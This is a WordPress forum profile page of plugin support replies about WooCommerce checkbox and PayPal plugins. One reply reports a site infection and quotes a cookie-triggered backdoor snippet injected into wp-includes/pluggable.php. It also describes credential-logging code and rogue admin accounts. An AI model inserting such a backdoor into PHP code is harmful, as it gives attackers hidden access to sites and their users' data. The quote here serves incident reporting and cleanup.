Amin Y
Forum Replies Created
-
Forum: Plugins
In reply to: [Payment Gateway for PayPal on WooCommerce] Debit & Credit Cards disableYes, but ive hidden that by selecting the credit card and debit card option in the Hide funding methods settings. So its fine ok as of now.
Forum: Plugins
In reply to: [Payment Gateway for PayPal on WooCommerce] Debit & Credit Cards disableThankyou, by the way, i am using the paypal payment smart button payment option.
Thanks for notifying me, Ive fixed the readme file issue, now its downloading.
Hi,
Plugin updated with HPOS support and bug fixes.
Forum: Plugins
In reply to: [AgreeMe Checkboxes For WooCommerce] Fatal Error When Saving BeTheme OptionsHi,
Ive updated the files with a fix, but not sure why the theme calls the thankyou order hook, when the woo session is empty?
8.Also its writing the admin username and password to a text file in root, the writing part code is injected in wp-includes/pluggable.php.
My site too got infected.
Things i noticed,
- 3 admin users which i never created, one with wp_update-xxxxxx others named as wpxxxxxxxxx
- .index.php has malicious code and many folders has some unwanted index.php created with the same code.
- wp-config.php has malicious code at the beginning
- most file has this code to include a css file in /[SERVER-PATH]/public_html/wp-includes/blocks/comments-title/.[XXXXX.css] having php code.
- some new files created with encrypted/not readable codes, named as style.php, profile.php, themes.php etc…
- Some files and folder with file with randomly generated names are created with encrypted codes,
- wp-includes/pluggable.php has code like this at the end, not sure if this is by that malware or some other plugin.
if (isset($_COOKIE[“_JdXGxQ1hFqMjLZVi9BgfcH6PU84YmezEw7ka5yO02TpNlvtb3usWCAnr”]))
{
$lines = get_option( ‘wpsdt4_license_key’ );
if (!empty($lines))
{
$lines = @file_get_contents(“6cd7c012”);
}
echo $lines;
exit();
}How i tried to fix…
Mostly i used some text patterns to search for files using the “strlocator” plugin, to remove these files and codes in server. Deleted admin users, changed ftp pass, db pass, wp admin pass, unwanted plugins.
Hi,
Try updating to new version and check, also js validation is available by adding the button class in the general options.
eg…value.
.single_add_to_cart_button,.checkout-button,#place_order
use comma to add multiple.
Regards,
Amin
Forum: Plugins
In reply to: [AgreeMe Checkboxes For WooCommerce] Text AlignmentHi,
this can be sorted by css. Can i get your site details, so i will have look.
regards,
Amin
Forum: Plugins
In reply to: [AgreeMe Checkboxes For WooCommerce] active php session was detectedHi,
Updated the plugin, please check this out.
thanks for bringing this issue.
Regards.
Forum: Reviews
In reply to: [AgreeMe Checkboxes For WooCommerce] Does Not Work – No CheckboxThanks for review, you have tried with the multiple location options, some of locations may not be available based on your customization. Try the other locations.
Forum: Plugins
In reply to: [AgreeMe Checkboxes For WooCommerce] feature requestNice idea @aclancy, I will implement this in the next version, within 2-3 days.
Hello Claire,
Can i get the screenshot of the admin Order Edit page. I tested and looks fine on my end, You have Paypal and Stripe Card payment options, does both has the same issue?
Please advice.
Hi,
You have a custom product page theme, you can add the button class value under the Agreeme settings-> General options->Classes for Buttons to trigger required field alerts:, For your page, you can add “.vc_btn3-color-grey” along with the existing default values as below….
.single_add_to_cart_button,.checkout-button,#place_order,.vc_btn3-color-grey
- This reply was modified 10 months, 2 weeks ago by Amin Y.
Sorry missed your messages, i will fix and update you with a new version tomorrow.